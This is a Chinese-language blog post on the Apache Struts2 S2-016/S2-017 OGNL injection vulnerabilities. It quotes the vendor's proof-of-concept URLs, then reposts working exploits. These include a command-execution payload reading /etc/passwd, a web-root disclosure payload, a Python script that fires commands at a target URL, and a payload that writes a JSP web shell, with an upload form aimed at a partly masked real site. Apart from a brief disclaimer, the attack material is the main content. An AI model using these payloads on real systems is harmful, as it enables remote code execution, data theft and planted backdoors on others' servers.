Jarett's Blog

这下互联网是真的又要来一场血雨腥风了，Struts组官方已经发布了公告，我认为这次官方有很大责任，居然直接发了POC：
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html

官方给出的POC如下，实际上那张图的calc是从服务端运行的，由于是localhost，看起来像客户端弹的。。。

1.Simple Expression – the parameter names are evaluated as OGNL.

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

2.Command Execution

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

转几个EXP，以下仅供教学研究之用，严禁非法用途！

执行任意命令EXP，感谢X提供：

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆网站路径EXP，感谢h4ck0r提供：

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

python执行任意命令，感谢h4ck0r提供

import urllib2,sys,re

def get(url, data):
	string = url + "?" + data
	req = urllib2.Request("%s"%string)
	response = urllib2.urlopen(req).read().strip()
	print strip(response)

def strip(str):
   tmp = str.strip()
   blank_line=re.compile('\x00')
   tmp=blank_line.sub('',tmp)
   return tmp

if __name__ == '__main__':
	url = sys.argv[1]
	cmd = sys.argv[2]
	cmd1 = sys.argv[3]
	attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
	get(url,attack)

GETSHELL EXP，感谢coffee提供：

?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%

然后用以下代码写shell:

<form action="http://www.***.jp/acdap/test.jsp?f=1.jsp&quot; method="post">
<textarea >code</textarea>
<input type=submit value="提交">
</form>

上前目录生成1.jsp